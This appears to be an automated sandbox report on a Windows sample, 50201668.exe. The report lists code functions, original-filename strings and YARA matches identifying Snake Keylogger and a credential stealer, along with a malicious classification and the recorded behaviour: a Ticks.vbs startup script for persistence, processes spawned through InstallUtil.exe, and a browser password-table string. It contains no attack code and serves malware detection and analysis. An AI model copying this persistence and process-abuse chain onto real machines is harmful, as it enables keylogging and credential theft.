Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CAF360	12_2_06CAF360
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA0021	12_2_06CA0021
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D9F1E0	12_2_06D9F1E0
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D9761B	12_2_06D9761B
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D9021A	12_2_06D9021A
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D97630	12_2_06D97630
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D9CFC8	12_2_06D9CFC8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D99898	12_2_06D99898
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D97888	12_2_06D97888
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D998A8	12_2_06D998A8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D90040	12_2_06D90040
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D97878	12_2_06D97878
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D90007	12_2_06D90007
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06D97828	12_2_06D97828
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06E50040	12_2_06E50040
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06E50006	12_2_06E50006
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_07035FD8	12_2_07035FD8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_07035FBD	12_2_07035FBD
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_0712EA78	12_2_0712EA78
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_0712E560	12_2_0712E560
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_0711003B	12_2_0711003B
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_07110040	12_2_07110040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030C27B9	13_2_030C27B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030CC530	13_2_030CC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030C2DD1	13_2_030C2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030C9480	13_2_030C9480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030CC521	13_2_030CC521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_030C946F	13_2_030C946F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_06CD5DEC	13_2_06CD5DEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_06CDB650	13_2_06CDB650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_06CD31E0	13_2_06CD31E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_06CD6C71	13_2_06CD6C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_06CD4A60	13_2_06CD4A60

Source: 50201668.exe, 00000006.00000002.1425364910.00000000071A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 50201668.exe
Source: 50201668.exe, 00000006.00000000.1274766977.0000000000EA2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamereff.exe, vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1412323204.000000000353B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1411458056.000000000133E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamereff.exe, vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1423370134.0000000006C20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBekzz.dll" vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1422305540.0000000006064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamereff.exe, vs 50201668.exe
Source: 50201668.exe, 00000006.00000002.1421354221.0000000004249000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 50201668.exe
Source: 50201668.exe	Binary or memory string: OriginalFilenamereff.exe, vs 50201668.exe

Source: 50201668.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4

Source: C:\Users\user\Desktop\50201668.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs"

Source: 50201668.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 50201668.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000009.00000002.2520728746.00000000033A5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003395000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003383000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000336F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000338F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003351000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003360000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\50201668.exe

File read: C:\Users\user\Desktop\50201668.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\50201668.exe "C:\Users\user\Desktop\50201668.exe"
Source: C:\Users\user\Desktop\50201668.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Ticks.exe "C:\Users\user\AppData\Roaming\Ticks.exe"
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\50201668.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Ticks.exe "C:\Users\user\AppData\Roaming\Ticks.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
